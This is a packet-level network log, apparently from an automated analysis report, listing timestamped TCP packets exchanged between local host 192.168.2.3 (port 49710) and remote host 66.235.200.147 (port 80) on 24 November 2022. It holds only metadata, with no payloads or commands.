Nov 24, 2022 12:20:03.561018944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561029911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561050892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561050892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561069965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561074972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561089039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561095953 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561110020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561115026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561125994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561136007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561151028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561156988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561176062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561181068 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561193943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561197042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561218023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561242104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561253071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561261892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561283112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561283112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561301947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561309099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561322927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561336994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561342955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561356068 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561362982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561372042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561384916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561404943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561405897 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561405897 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561428070 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561429977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561444998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561464071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561479092 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561482906 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561501980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561506033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561522007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561542034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561557055 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561568022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561589956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561594009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561609030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561621904 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561626911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561645985 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561650038 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561665058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561685085 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561686039 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561703920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561713934 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561723948 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561727047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561743021 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561760902 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561767101 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561767101 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561779022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561779976 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561799049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561819077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561827898 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561840057 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561851025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561857939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561877966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561878920 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561897039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561917067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561933994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561933994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561933994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561934948 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561937094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561955929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561980009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562036037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562042952 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562042952 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562066078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562081099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562081099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562092066 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562094927 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562112093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562115908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562130928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562138081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562150002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562153101 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562169075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562175035 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562189102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562206030 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562206030 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562207937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562227011 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562247992 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562258005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562267065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562273026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562284946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562304020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562311888 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562324047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562342882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562361002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562361002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562365055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562372923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562395096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562403917 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562422037 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562423944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562448978 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562452078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562464952 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562477112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562503099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562508106 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562520027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562527895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562536955 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562550068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562568903 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562583923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562593937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562609911 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562618017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562634945 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562642097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562657118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562679052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562680006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562690020 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562702894 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562716961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562736034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562748909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562760115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562762022 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562788963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562793970 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562814951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562817097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562838078 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562841892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562864065 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562866926 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562891006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562912941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562923908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562936068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562962055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.562966108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.562982082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563002110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563015938 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563025951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563034058 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563049078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563069105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563072920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563081026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563096046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563112020 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563121080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563144922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563155890 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563169003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563170910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563186884 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563194990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563213110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563218117 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563236952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563261032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563261986 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563277960 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563287973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563307047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563312054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563334942 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563337088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563348055 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563359976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563380957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563402891 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563402891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563426018 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563430071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563452005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563455105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563467026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563479900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563500881 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563503027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563517094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563525915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563538074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563549042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563565016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563571930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563582897 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563595057 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563621044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563621998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563641071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563647032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563664913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563688993 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563690901 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563711882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563721895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563735008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563756943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563760042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563776016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563787937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563805103 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563812017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563824892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563836098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563847065 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563855886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563875914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563879013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563888073 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563901901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563920975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563927889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563935041 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563951015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563975096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.563975096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.563998938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564001083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564018965 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564023972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564043999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564057112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564066887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564073086 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564095020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564122915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564137936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564137936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564137936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564150095 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564158916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564177990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564199924 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564205885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564220905 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564232111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564258099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564276934 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564277887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564291000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564296961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564305067 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564316034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564326048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564338923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564341068 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564358950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564361095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564372063 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564378023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564394951 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564397097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564415932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564421892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564435005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564457893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564486980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564491987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564508915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564532042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564533949 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564559937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564577103 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564587116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564589977 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564599991 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564613104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564644098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564645052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564662933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564665079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564682007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564682961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564697027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564701080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564714909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564723969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564749002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564752102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564771891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564773083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564790964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564790964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564806938 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564810038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564830065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564831972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564847946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564850092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564868927 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564877033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.564910889 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.564938068 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.568192959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.568392038 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.583103895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583147049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583170891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583198071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583223104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583246946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583270073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583296061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583311081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.583319902 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583343983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583368063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583383083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.583391905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583415985 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583440065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583445072 CET	49710	80	192.168.2.3	66.235.200.147
